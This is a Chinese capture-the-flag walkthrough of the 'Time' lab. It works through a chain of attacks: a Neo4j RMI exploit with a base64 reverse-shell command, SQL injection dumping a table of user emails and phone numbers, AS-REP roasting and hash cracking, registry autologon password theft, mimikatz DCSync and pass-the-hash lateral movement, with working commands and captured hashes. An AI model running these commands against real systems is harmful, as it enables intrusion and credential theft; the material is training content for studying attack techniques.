春秋云境-Time
Neo4j RCE 老样子用fscan64
扫端口,下次尝试下masscan,听说挺好用的
1 .\fscan64.exe -h 39.101.195.58 -p 1-65535
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 ___ _ / _ \ ___ ___ _ __ __ _ ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / / /_\\_____\__ \ (__| | | (_| | (__| < \____/ |___/\___|_| \__,_|\___|_|\_\ fscan version: 1 .8 .2 start infoscan (icmp) Target 39 .101 .195 .58 is alive[*] Icmp alive hosts len is: 1 39.101.195.58:22 open39.101.195.58:1337 open39.101.195.58:7473 open39.101.195.58:7474 open39.101.195.58:7687 open39.101.195.58:34317 open[*] alive ports len is: 6 start vulscan 已完成 0 /6 [-] webtitle https://39 .101 .195 .58 :34317 Get "https://39.101.195.58:34317" : EOF[*] WebTitle: http://39 .101 .195 .58 :7474 code:303 len:0 title:None 跳转url: http://39 .101 .195 .58 :7474 /browser/[*] WebTitle: http://39 .101 .195 .58 :7474 /browser/ code:200 len:3279 title:Neo4j Browser[*] WebTitle: https://39 .101 .195 .58 :7473 code:303 len:0 title:None 跳转url: https://39 .101 .195 .58 :7473 /browser/[*] WebTitle: https://39 .101 .195 .58 :7687 code:400 len:50 title:None[*] WebTitle: https://39 .101 .195 .58 :7473 /browser/ code:200 len:3279 title:Neo4j Browser 已完成 6 /6 [*] 扫描结束,耗时: 6m2.1584069s
这里有个Neo4j RCE
rhino_gadget.jar:https://github.com/zwjjustdoit/CVE-2021-34371.jar
1 java -jar rhino_gadget.jar rmi:// 39.101 .195.58 :1337 "bash -c {echo,YmFzaCAta......S4xNDgvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}"
打1337端口
vps执行:
执行成功,弹上shell,找一下flag文件
既然可以直接读取flag了,就不提权了吧,省时间。。。
内网信息搜集
wget传fscan和frp,记得先切换到tmp或者用户目录
下次换个代理工具试试./
1 2 3 wget http://i p/fscan_amd64 wget http://i p/frpc wget http://i p/frpc.toml
给权限,执行
1 2 3 chmod +x * ./fscan_amd64 -h 172.22.6.0/24 >> 5.txtcat 5.txt
多扫几次,有时候会漏扫,或者没扫出东西
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 start infoscan trying RunIcmp2 The current user permissions unable to send icmp packets start ping (icmp) Target 172 .22 .6 .12 is alive (icmp) Target 172 .22 .6 .25 is alive (icmp) Target 172 .22 .6 .36 is alive (icmp) Target 172 .22 .6 .38 is alive[*] Icmp alive hosts len is: 4 172.22.6.12:139 open172.22.6.25:445 open172.22.6.25:139 open172.22.6.12:445 open172.22.6.25:135 open172.22.6.12:135 open172.22.6.38:80 open172.22.6.38:22 open172.22.6.12:88 open[*] alive ports len is: 9 start vulscan[*] NetInfo:[*] 172 .22 .6 .25 [->] WIN2019 [->] 172 .22 .6 .25 [*] NetInfo:[*] 172 .22 .6 .12 [->] DC-PROGAME [->] 172 .22 .6 .12 [*] NetBios: 172 .22 .6 .25 XIAORANG\WIN2019 [*] 172 .22 .6 .12 (Windows Server 2016 Datacenter 14393 )[*] NetBios: 172 .22 .6 .12 [+] DC DC-PROGAME.xiaorang.lab Windows Server 2016 Datacenter 14393 [*] WebTitle: http://172 .22 .6 .38 code:200 len:1531 title:后台登录 已完成 9 /9 [*] 扫描结束,耗时: 14 .837356535s
还是老样子4个机子
1 2 3 4 172.22.6.12 域控DC172.22.6.25 域内机器172.22.6.36 已被拿下(未提权)172.22.6.38 域内机器(web后台登录)
搭代理
1 2 ./frps -c ./ frps.toml // vps ./frpc -c ./ frpc.toml // 受害机
SQL注入 先打172.22.6.38这个web服务
然后bp抓数据包,这里只需要给bp添加一个下游代理,即代理服务器地址,这里的代理类型为SOCKS5,其他浏览器和bp中间的操作不变
注意要将浏览器代理插件的代理关掉,比如上图右上角的那个代理插件
然后就是正常抓包就可以了
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 POST /index.php HTTP/1 .1 Host : 172.22.6.38 Content -Length: 29 Cache -Control: max-age=0 Upgrade -Insecure-Requests: 1 Origin : http://172.22.6.38 Content -Type: application/x-www-form-urlencodedUser -Agent: Mozilla/5 .0 (Windows NT 10 .0 ; Win64; x64) AppleWebKit/537 .36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537 .36 Edg/121.0.0.0 Accept : text/html,application/xhtml+xml,application/xml;q=0 .9 ,image/avif,image/webp,image/apng,*/*;q=0 .8 ,application/signed-exchange;v=b3;q=0 .7 Referer : http://172.22.6.38 /index.phpAccept -Encoding: gzip, deflate, brAccept -Language: zh-CN,zh;q=0 .9 ,en;q=0 .8 ,en-GB;q=0 .7 ,en-US;q=0 .6 Connection : closeusername =admin&password=admin
保存为1.txt,然后sqlmap无脑启动!
1 2 3 proxychains4 sqlmap -r 1 .txt --dbs proxychains4 sqlmap -r 1 .txt -D oa_db --tables proxychains4 sqlmap -r 1 .txt -D oa_db -T oa_f1Agggg -C flag02 --dump
AS-REP Roasting 再看看还有没有其他有用的数据,看看admin和users两个表
1 administrator: bo2y8kAL3HnXUiQo
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 +-----+----------------------------+-------------+-----------------+ | id | email | phone | username | +-----+----------------------------+-------------+-----------------+ | 245 | chenyan@xiaorang.lab | 18281528743 | CHEN YAN | | 246 | tanggui@xiaorang.lab | 18060615547 | TANG GUI | | 247 | buning@xiaorang.lab | 13046481392 | BU NING | | 248 | beishu@xiaorang.lab | 18268508400 | BEI SHU | | 249 | shushi@xiaorang.lab | 17770383196 | SHU SHI | | 250 | fuyi@xiaorang.lab | 18902082658 | FU YI | | 251 | pangcheng@xiaorang.lab | 18823789530 | PANG CHENG | | 252 | tonghao@xiaorang.lab | 13370873526 | TONG HAO | | 253 | jiaoshan@xiaorang.lab | 15375905173 | JIAO SHAN | | 254 | dulun@xiaorang.lab | 13352331157 | DU LUN | | 255 | kejuan@xiaorang.lab | 13222550481 | KE JUAN | | 256 | gexin@xiaorang.lab | 18181553086 | GE XIN | | 257 | lugu@xiaorang.lab | 18793883130 | LU GU | | 258 | guzaicheng@xiaorang.lab | 15309377043 | GU ZAI CHENG | | 259 | feicai@xiaorang.lab | 13077435367 | FEI CAI | | 260 | ranqun@xiaorang.lab | 18239164662 | RAN QUN | | 261 | zhouyi@xiaorang.lab | 13169264671 | ZHOU YI | | 262 | shishu@xiaorang.lab | 18592890189 | SHI SHU | | 263 | yanyun@xiaorang.lab | 15071085768 | YAN YUN | | 264 | chengqiu@xiaorang.lab | 13370162980 | CHENG QIU | | 265 | louyou@xiaorang.lab | 13593582379 | LOU YOU | | 266 | maqun@xiaorang.lab | 15235945624 | MA QUN | | 267 | wenbiao@xiaorang.lab | 13620643639 | WEN BIAO | | 268 | weishengshan@xiaorang.lab | 18670502260 | WEI SHENG SHAN | | 269 | zhangxin@xiaorang.lab | 15763185760 | ZHANG XIN | | 270 | chuyuan@xiaorang.lab | 18420545268 | CHU YUAN | | 271 | wenliang@xiaorang.lab | 13601678032 | WEN LIANG | | 272 | yulvxue@xiaorang.lab | 18304374901 | YU LV XUE | | 273 | luyue@xiaorang.lab | 18299785575 | LU YUE | | 274 | ganjian@xiaorang.lab | 18906111021 | GAN JIAN | | 275 | pangzhen@xiaorang.lab | 13479328562 | PANG ZHEN | | 276 | guohong@xiaorang.lab | 18510220597 | GUO HONG | | 277 | lezhong@xiaorang.lab | 15320909285 | LE ZHONG | | 278 | sheweiyue@xiaorang.lab | 13736399596 | SHE WEI YUE | | 279 | dujian@xiaorang.lab | 15058892639 | DU JIAN | | 280 | lidongjin@xiaorang.lab | 18447207007 | LI DONG JIN | | 281 | hongqun@xiaorang.lab | 15858462251 | HONG QUN | | 282 | yexing@xiaorang.lab | 13719043564 | YE XING | | 283 | maoda@xiaorang.lab | 13878840690 | MAO DA | | 284 | qiaomei@xiaorang.lab | 13053207462 | QIAO MEI | | 285 | nongzhen@xiaorang.lab | 15227699960 | NONG ZHEN | | 286 | dongshu@xiaorang.lab | 15695562947 | DONG SHU | | 287 | zhuzhu@xiaorang.lab | 13070163385 | ZHU ZHU | | 288 | jiyun@xiaorang.lab | 13987332999 | JI YUN | | 289 | qiguanrou@xiaorang.lab | 15605983582 | QI GUAN ROU | | 290 | yixue@xiaorang.lab | 18451603140 | YI XUE | | 291 | chujun@xiaorang.lab | 15854942459 | CHU JUN | | 292 | shenshan@xiaorang.lab | 17712052191 | SHEN SHAN | | 293 | lefen@xiaorang.lab | 13271196544 | LE FEN | | 294 | yubo@xiaorang.lab | 13462202742 | YU BO | | 295 | helianrui@xiaorang.lab | 15383000907 | HE LIAN RUI | | 296 | xuanqun@xiaorang.lab | 18843916267 | XUAN QUN | | 297 | shangjun@xiaorang.lab | 15162486698 | SHANG JUN | | 298 | huguang@xiaorang.lab | 18100586324 | HU GUANG | | 299 | wansifu@xiaorang.lab | 18494761349 | WAN SI FU | | 300 | fenghong@xiaorang.lab | 13536727314 | FENG HONG | | 301 | wanyan@xiaorang.lab | 17890844429 | WAN YAN | | 302 | diyan@xiaorang.lab | 18534028047 | DI YAN | | 303 | xiangyu@xiaorang.lab | 13834043047 | XIANG YU | | 304 | songyan@xiaorang.lab | 15282433280 | SONG YAN | | 305 | fandi@xiaorang.lab | 15846960039 | FAN DI | | 306 | xiangjuan@xiaorang.lab | 18120327434 | XIANG JUAN | | 307 | beirui@xiaorang.lab | 18908661803 | BEI RUI | | 308 | didi@xiaorang.lab | 13413041463 | DI DI | | 309 | zhubin@xiaorang.lab | 15909558554 | ZHU BIN | | 310 | lingchun@xiaorang.lab | 13022790678 | LING CHUN | | 311 | zhenglu@xiaorang.lab | 13248244873 | ZHENG LU | | 312 | xundi@xiaorang.lab | 18358493414 | XUN DI | | 313 | wansishun@xiaorang.lab | 18985028319 | WAN SI SHUN | | 314 | yezongyue@xiaorang.lab | 13866302416 | YE ZONG YUE | | 315 | bianmei@xiaorang.lab | 18540879992 | BIAN MEI | | 316 | shanshao@xiaorang.lab | 18791488918 | SHAN SHAO | | 317 | zhenhui@xiaorang.lab | 13736784817 | ZHEN HUI | | 318 | chengli@xiaorang.lab | 15913267394 | CHENG LI | | 319 | yufen@xiaorang.lab | 18432795588 | YU FEN | | 320 | jiyi@xiaorang.lab | 13574211454 | JI YI | | 321 | panbao@xiaorang.lab | 13675851303 | PAN BAO | | 322 | mennane@xiaorang.lab | 15629706208 | MEN NAN E | | 323 | fengsi@xiaorang.lab | 13333432577 | FENG SI | | 324 | mingyan@xiaorang.lab | 18296909463 | MING YAN | | 325 | luoyou@xiaorang.lab | 15759321415 | LUO YOU | | 326 | liangduanqing@xiaorang.lab | 13150744785 | LIANG DUAN QING | | 327 | nongyan@xiaorang.lab | 18097386975 | NONG YAN | | 328 | haolun@xiaorang.lab | 15152700465 | HAO LUN | | 329 | oulun@xiaorang.lab | 13402760696 | OU LUN | | 330 | weichipeng@xiaorang.lab | 18057058937 | WEI CHI PENG | | 331 | qidiaofang@xiaorang.lab | 18728297829 | QI DIAO FANG | | 332 | xuehe@xiaorang.lab | 13398862169 | XUE HE | | 333 | chensi@xiaorang.lab | 18030178713 | CHEN SI | | 334 | guihui@xiaorang.lab | 17882514129 | GUI HUI | | 335 | fuyue@xiaorang.lab | 18298436549 | FU YUE | | 336 | wangxing@xiaorang.lab | 17763645267 | WANG XING | | 337 | zhengxiao@xiaorang.lab | 18673968392 | ZHENG XIAO | | 338 | guhui@xiaorang.lab | 15166711352 | GU HUI | | 339 | baoai@xiaorang.lab | 15837430827 | BAO AI | | 340 | hangzhao@xiaorang.lab | 13235488232 | HANG ZHAO | | 341 | xingye@xiaorang.lab | 13367587521 | XING YE | | 342 | qianyi@xiaorang.lab | 18657807767 | QIAN YI | | 343 | xionghong@xiaorang.lab | 17725874584 | XIONG HONG | | 344 | zouqi@xiaorang.lab | 15300430128 | ZOU QI | | 345 | rongbiao@xiaorang.lab | 13034242682 | RONG BIAO | | 346 | gongxin@xiaorang.lab | 15595839880 | GONG XIN | | 347 | luxing@xiaorang.lab | 18318675030 | LU XING | | 348 | huayan@xiaorang.lab | 13011805354 | HUA YAN | | 349 | duyue@xiaorang.lab | 15515878208 | DU YUE | | 350 | xijun@xiaorang.lab | 17871583183 | XI JUN | | 351 | daiqing@xiaorang.lab | 18033226216 | DAI QING | | 352 | yingbiao@xiaorang.lab | 18633421863 | YING BIAO | | 353 | hengteng@xiaorang.lab | 15956780740 | HENG TENG | | 354 | changwu@xiaorang.lab | 15251485251 | CHANG WU | | 355 | chengying@xiaorang.lab | 18788248715 | CHENG YING | | 356 | luhong@xiaorang.lab | 17766091079 | LU HONG | | 357 | tongxue@xiaorang.lab | 18466102780 | TONG XUE | | 358 | xiangqian@xiaorang.lab | 13279611385 | XIANG QIAN | | 359 | shaokang@xiaorang.lab | 18042645434 | SHAO KANG | | 360 | nongzhu@xiaorang.lab | 13934236634 | NONG ZHU | | 361 | haomei@xiaorang.lab | 13406913218 | HAO MEI | | 362 | maoqing@xiaorang.lab | 15713298425 | MAO QING | | 363 | xiai@xiaorang.lab | 18148404789 | XI AI | | 364 | bihe@xiaorang.lab | 13628593791 | BI HE | | 365 | gaoli@xiaorang.lab | 15814408188 | GAO LI | | 366 | jianggong@xiaorang.lab | 15951118926 | JIANG GONG | | 367 | pangning@xiaorang.lab | 13443921700 | PANG NING | | 368 | ruishi@xiaorang.lab | 15803112819 | RUI SHI | | 369 | wuhuan@xiaorang.lab | 13646953078 | WU HUAN | | 370 | qiaode@xiaorang.lab | 13543564200 | QIAO DE | | 371 | mayong@xiaorang.lab | 15622971484 | MA YONG | | 372 | hangda@xiaorang.lab | 15937701659 | HANG DA | | 373 | changlu@xiaorang.lab | 13734991654 | CHANG LU | | 374 | liuyuan@xiaorang.lab | 15862054540 | LIU YUAN | | 375 | chenggu@xiaorang.lab | 15706685526 | CHENG GU | | 376 | shentuyun@xiaorang.lab | 15816902379 | SHEN TU YUN | | 377 | zhuangsong@xiaorang.lab | 17810274262 | ZHUANG SONG | | 378 | chushao@xiaorang.lab | 18822001640 | CHU SHAO | | 379 | heli@xiaorang.lab | 13701347081 | HE LI | | 380 | haoming@xiaorang.lab | 15049615282 | HAO MING | | 381 | xieyi@xiaorang.lab | 17840660107 | XIE YI | | 382 | shangjie@xiaorang.lab | 15025010410 | SHANG JIE | | 383 | situxin@xiaorang.lab | 18999728941 | SI TU XIN | | 384 | linxi@xiaorang.lab | 18052976097 | LIN XI | | 385 | zoufu@xiaorang.lab | 15264535633 | ZOU FU | | 386 | qianqing@xiaorang.lab | 18668594658 | QIAN QING | | 387 | qiai@xiaorang.lab | 18154690198 | QI AI | | 388 | ruilin@xiaorang.lab | 13654483014 | RUI LIN | | 389 | luomeng@xiaorang.lab | 15867095032 | LUO MENG | | 390 | huaren@xiaorang.lab | 13307653720 | HUA REN | | 391 | yanyangmei@xiaorang.lab | 15514015453 | YAN YANG MEI | | 392 | zuofen@xiaorang.lab | 15937087078 | ZUO FEN | | 393 | manyuan@xiaorang.lab | 18316106061 | MAN YUAN | | 394 | yuhui@xiaorang.lab | 18058257228 | YU HUI | | 395 | sunli@xiaorang.lab | 18233801124 | SUN LI | | 396 | guansixin@xiaorang.lab | 13607387740 | GUAN SI XIN | | 397 | ruisong@xiaorang.lab | 13306021674 | RUI SONG | | 398 | qiruo@xiaorang.lab | 13257810331 | QI RUO | | 399 | jinyu@xiaorang.lab | 18565922652 | JIN YU | | 400 | shoujuan@xiaorang.lab | 18512174415 | SHOU JUAN | | 401 | yanqian@xiaorang.lab | 13799789435 | YAN QIAN | | 402 | changyun@xiaorang.lab | 18925015029 | CHANG YUN | | 403 | hualu@xiaorang.lab | 13641470801 | HUA LU | | 404 | huanming@xiaorang.lab | 15903282860 | HUAN MING | | 405 | baoshao@xiaorang.lab | 13795275611 | BAO SHAO | | 406 | hongmei@xiaorang.lab | 13243605925 | HONG MEI | | 407 | manyun@xiaorang.lab | 13238107359 | MAN YUN | | 408 | changwan@xiaorang.lab | 13642205622 | CHANG WAN | | 409 | wangyan@xiaorang.lab | 13242486231 | WANG YAN | | 410 | shijian@xiaorang.lab | 15515077573 | SHI JIAN | | 411 | ruibei@xiaorang.lab | 18157706586 | RUI BEI | | 412 | jingshao@xiaorang.lab | 18858376544 | JING SHAO | | 413 | jinzhi@xiaorang.lab | 18902437082 | JIN ZHI | | 414 | yuhui@xiaorang.lab | 15215599294 | YU HUI | | 415 | zangpeng@xiaorang.lab | 18567574150 | ZANG PENG | | 416 | changyun@xiaorang.lab | 15804640736 | CHANG YUN | | 417 | yetai@xiaorang.lab | 13400150018 | YE TAI | | 418 | luoxue@xiaorang.lab | 18962643265 | LUO XUE | | 419 | moqian@xiaorang.lab | 18042706956 | MO QIAN | | 420 | xupeng@xiaorang.lab | 15881934759 | XU PENG | | 421 | ruanyong@xiaorang.lab | 15049703903 | RUAN YONG | | 422 | guliangxian@xiaorang.lab | 18674282714 | GU LIANG XIAN | | 423 | yinbin@xiaorang.lab | 15734030492 | YIN BIN | | 424 | huarui@xiaorang.lab | 17699257041 | HUA RUI | | 425 | niuya@xiaorang.lab | 13915041589 | NIU YA | | 426 | guwei@xiaorang.lab | 13584571917 | GU WEI | | 427 | qinguan@xiaorang.lab | 18427953434 | QIN GUAN | | 428 | yangdanhan@xiaorang.lab | 15215900100 | YANG DAN HAN | | 429 | yingjun@xiaorang.lab | 13383367818 | YING JUN | | 430 | weiwan@xiaorang.lab | 13132069353 | WEI WAN | | 431 | sunduangu@xiaorang.lab | 15737981701 | SUN DUAN GU | | 432 | sisiwu@xiaorang.lab | 18021600640 | SI SI WU | | 433 | nongyan@xiaorang.lab | 13312613990 | NONG YAN | | 434 | xuanlu@xiaorang.lab | 13005748230 | XUAN LU | | 435 | yunzhong@xiaorang.lab | 15326746780 | YUN ZHONG | | 436 | gengfei@xiaorang.lab | 13905027813 | GENG FEI | | 437 | zizhuansong@xiaorang.lab | 13159301262 | ZI ZHUAN SONG | | 438 | ganbailong@xiaorang.lab | 18353612904 | GAN BAI LONG | | 439 | shenjiao@xiaorang.lab | 15164719751 | SHEN JIAO | | 440 | zangyao@xiaorang.lab | 18707028470 | ZANG YAO | | 441 | yangdanhe@xiaorang.lab | 18684281105 | YANG DAN HE | | 442 | chengliang@xiaorang.lab | 13314617161 | CHENG LIANG | | 443 | xudi@xiaorang.lab | 18498838233 | XU DI | | 444 | wulun@xiaorang.lab | 18350490780 | WU LUN | | 445 | yuling@xiaorang.lab | 18835870616 | YU LING | | 446 | taoya@xiaorang.lab | 18494928860 | TAO YA | | 447 | jinle@xiaorang.lab | 15329208123 | JIN LE | | 448 | youchao@xiaorang.lab | 13332964189 | YOU CHAO | | 449 | liangduanzhi@xiaorang.lab | 15675237494 | LIANG DUAN ZHI | | 450 | jiagupiao@xiaorang.lab | 17884962455 | JIA GU PIAO | | 451 | ganze@xiaorang.lab | 17753508925 | GAN ZE | | 452 | jiangqing@xiaorang.lab | 15802357200 | JIANG QING | | 453 | jinshan@xiaorang.lab | 13831466303 | JIN SHAN | | 454 | zhengpubei@xiaorang.lab | 13690156563 | ZHENG PU BEI | | 455 | cuicheng@xiaorang.lab | 17641589842 | CUI CHENG | | 456 | qiyong@xiaorang.lab | 13485427829 | QI YONG | | 457 | qizhu@xiaorang.lab | 18838859844 | QI ZHU | | 458 | ganjian@xiaorang.lab | 18092585003 | GAN JIAN | | 459 | yurui@xiaorang.lab | 15764121637 | YU RUI | | 460 | feishu@xiaorang.lab | 18471512248 | FEI SHU | | 461 | chenxin@xiaorang.lab | 13906545512 | CHEN XIN | | 462 | shengzhe@xiaorang.lab | 18936457394 | SHENG ZHE | | 463 | wohong@xiaorang.lab | 18404022650 | WO HONG | | 464 | manzhi@xiaorang.lab | 15973350408 | MAN ZHI | | 465 | xiangdong@xiaorang.lab | 13233908989 | XIANG DONG | | 466 | weihui@xiaorang.lab | 15035834945 | WEI HUI | | 467 | xingquan@xiaorang.lab | 18304752969 | XING QUAN | | 468 | miaoshu@xiaorang.lab | 15121570939 | MIAO SHU | | 469 | gongwan@xiaorang.lab | 18233990398 | GONG WAN | | 470 | qijie@xiaorang.lab | 15631483536 | QI JIE | | 471 | shaoting@xiaorang.lab | 15971628914 | SHAO TING | | 472 | xiqi@xiaorang.lab | 18938747522 | XI QI | | 473 | jinghong@xiaorang.lab | 18168293686 | JING HONG | | 474 | qianyou@xiaorang.lab | 18841322688 | QIAN YOU | | 475 | chuhua@xiaorang.lab | 15819380754 | CHU HUA | | 476 | yanyue@xiaorang.lab | 18702474361 | YAN YUE | | 477 | huangjia@xiaorang.lab | 13006878166 | HUANG JIA | | 478 | zhouchun@xiaorang.lab | 13545820679 | ZHOU CHUN | | 479 | jiyu@xiaorang.lab | 18650881187 | JI YU | | 480 | wendong@xiaorang.lab | 17815264093 | WEN DONG | | 481 | heyuan@xiaorang.lab | 18710821773 | HE YUAN | | 482 | mazhen@xiaorang.lab | 18698248638 | MA ZHEN | | 483 | shouchun@xiaorang.lab | 15241369178 | SHOU CHUN | | 484 | liuzhe@xiaorang.lab | 18530936084 | LIU ZHE | | 485 | fengbo@xiaorang.lab | 15812110254 | FENG BO | | 486 | taigongyuan@xiaorang.lab | 15943349034 | TAI GONG YUAN | | 487 | gesheng@xiaorang.lab | 18278508909 | GE SHENG | | 488 | songming@xiaorang.lab | 13220512663 | SONG MING | | 489 | yuwan@xiaorang.lab | 15505678035 | YU WAN | | 490 | diaowei@xiaorang.lab | 13052582975 | DIAO WEI | | 491 | youyi@xiaorang.lab | 18036808394 | YOU YI | | 492 | rongxianyu@xiaorang.lab | 18839918955 | RONG XIAN YU | | 493 | fuyi@xiaorang.lab | 15632151678 | FU YI | | 494 | linli@xiaorang.lab | 17883399275 | LIN LI | | 495 | weixue@xiaorang.lab | 18672465853 | WEI XUE | | 496 | hejuan@xiaorang.lab | 13256081102 | HE JUAN | | 497 | zuoqiutai@xiaorang.lab | 18093001354 | ZUO QIU TAI | | 498 | siyi@xiaorang.lab | 17873307773 | SI YI | | 499 | shenshan@xiaorang.lab | 18397560369 | SHEN SHAN | | 500 | tongdong@xiaorang.lab | 15177549595 | TONG DONG | +-----+----------------------------+-------------+-----------------+
flag1提示了查找未设置预认证的账号 ,所以先将用户名提取出来,这里将数据导入vim中,Ctrl+V 选中列,d删除
剩下用户名那列
然后在txt中用替换,将多余的空格和@xiaorang.lab后缀删除
1 proxychains4 python3 GetNPUsers.py -dc-ip 172.22.6.12 -usersfile 2 .txt xiaorang.lab/
预身份验证默认是不关闭的,但当关闭了预身份验证后,攻击者可以使用指定用户向域控制器的Kerberos 88端口请求票据,此时域控不会进行任何验证就将TGT和该用户Hash加密的Login Session Key 返回。
因此,攻击者就可以对获取到的用户Hash加密的 Login Session Key 进行离线破解,如果字典够强大,则可能破解得到该指定用户的明文密码
跑出来了
1 $krb5 asrep$23 $zhangxin@XIAORANG.LAB :3 a3 ff2711e347 d1 beba0802 d38566468 $bf07 c 6 fd4 ffb3 d9 d459329347641 dd1618 c 720 bd0 a9e156 eba973489 c 40 f39 fe92 b9 da9 a42 bb083 d7 c 0 dfbc98 a2 c 3413 dc6 b97394 ff5622 de380 c 2e74 aeda45e3 dd17 d5 cbee9214 fa0e441722 f05 f3 d65 cd0 b9352 b62309 c 2 ddcf14 bc19 d304 a32 dfdbf3313577 eda80 b806 a2263712352 d95 a53 f92 bda49 eec8e25 aab65 b72216 ab71013 edfb06 ba30 a271 d56 bfcd8 c 2 db52 c 1e7 f9783e22 a8e845 c 3 bea5 fac885 c 65 b5218 cce1 afe96 b46 bf08 fc6 c 2 bbdc9 f2 aaaac3 ac404387 ede6460e1 eb8 cd99e5 b7 c 3 c 381 be6 d28 dfef3063053 aa8 c 0365 faafd936221583e67 a40382 bcce519087074 c 39 fd8e72907
保存到1.txt,hashcat爆破一下,确保当前目录下有rockyou字典
1 hashcat -m 18200 1 .txt -a 0 ./rockyou.txt --force
1 2 账号:zhangxin@ XIAORANG.LAB 密码:strawberry
Windows自动登录密码抓取 刚才拿到的账号密码可以rdp连上172.22.6.25
上传SharpHound进行数据采集
查看一下用户
用户与计算机时进行会话时,凭据会保留在内存中,说明yuxuan这个用户登录过WIN2019,很多用户习惯将计算机设置自动登录
可以尝试抓取一下该用户的密码
1 reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
或者使用msf抓取
1 meterpreter > run windows/gather/ credentials/windows_autologin
1 2 3 4 AutoAdminLogon REG_SZ 1 DefaultUserName REG_SZ yuxuanDefaultPassword REG_SZ Yuxuan7QbrgZ3LDefaultDomainName REG_SZ xiaorang.lab
换该用户登上rdp
通过BloodHound的域内关系分析,发现这个用户滥用了SID历史功能
HasSIDHistory:一个为支持域迁移方案而设置的属性,当一个对象从一个域迁移到另一个域时,会在新域创建一个新的SID作为该对象的objectSid,在之前域中的SID会添加到该对象的sIDHistory属性中,此时该对象将保留在原来域的SID对应的访问权限)
也就是说虽然用户不属于前域,但仍拥有前域的权限
PTH 因为yuxuan这个用户保留域管理员的访问权限,使用可以mimikatz抓Administrator的哈希
1 mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /user:Administrator" exit
1 04d 93ffd6f5f6e4490e0de23f240a5e9
smbexec横向
1 proxychains4 python3 smbexec.py -hashes :04 d93ffd6f5f6e4490e0de23f240a5e9 administrator@172.22.6.12
1 type C :\Users\Administrator\flag\flag*
然后在拿这个高权限横向回刚才rdp的机子
1 proxychains4 python3 wmiexec.py XIAORANG/administrator@172.22.6.25 -hashes :04 d93ffd6f5f6e4490e0de23f240a5e9
1 type C :\Users\Administrator\flag\flag*
或者
1 proxychains4 crackmapexec smb 172.22.6.25 -u administrator -H04d93ffd6f5f6e4490e0de23f240a5e9 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"
搞定搞定!